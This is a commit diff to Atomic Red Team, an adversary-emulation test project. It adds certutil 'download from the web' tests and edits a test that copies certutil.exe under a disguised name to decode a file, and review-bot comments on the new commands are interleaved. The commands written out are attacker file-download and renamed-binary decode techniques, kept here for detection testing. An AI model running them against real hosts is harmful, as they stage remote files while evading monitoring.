Certutil update (#452)

* Fixing certutil syntax error

* Adding certutil download tests

* Adding commands to rename download for verifyctl argument

* Fixing type syntax
Keep Watcher
2019-02-14 01:10:39 -05:00
committed by Zac Brown
parent e0d70c657d
commit 02dc3e41ab
2 changed files with 41 additions and 1 deletions
+40
@@ -170,3 +170,43 @@ atomic_tests:
name: bash
command: |
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
- name: certutil download (urlcache)
description: |
Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
default: Atomic-license.txt
executor:
name: command_prompt
command: |
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
- name: certutil download (verifyctl)
description: |
Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
default: Atomic-license.txt
executor:
name: powershell
command: |
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
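Review bot: The verifyctl test's PowerShell block calls `Set-Location $datePath` and never returns, so the session stays in the dated directory after the test. Its final `Move-Item` also runs once per non-.txt file with the same `#{local_path}` destination, so it fails on the second file if certutil leaves more than one behind. Use `Push-Location $datePath` with a closing `Pop-Location`, and quote the substituted values (`"#{remote_file}"`, `"#{local_path}"`) in both new tests so a URL or path containing spaces or `&` is passed as a single argument. Neither test removes what it creates (the downloaded file, the dated directory and, presumably, the certutil URL cache entry), so the descriptions should say which artifacts remain on the host after a run.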
+1 -1
@@ -39,4 +39,4 @@ atomic_tests:
name: command_prompt
command: |
cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
cmd.exe /c %temp%tcm.tmp -decode #{executable}
cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt
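Review bot: The `-decode #{executable} file.txt` line writes to a hard-coded `file.txt` in whatever directory the executor starts in. As far as I know, certutil's `-decode` refuses to overwrite an existing output file unless `-f` is given, so a second run of the test is likely to fail. Consider writing under `%temp%` and adding `-f`, e.g. `cmd.exe /c %temp%tcm.tmp -decode -f #{executable} %temp%\file.txt`, or exposing the output path as an input argument. Separately, `%temp%tcm.tmp` has no separator after `%temp%`, so the renamed copy lands next to the Temp directory rather than inside it; if that is unintended, the copy line and both decode lines need the same fix. The test definition begins outside this hunk.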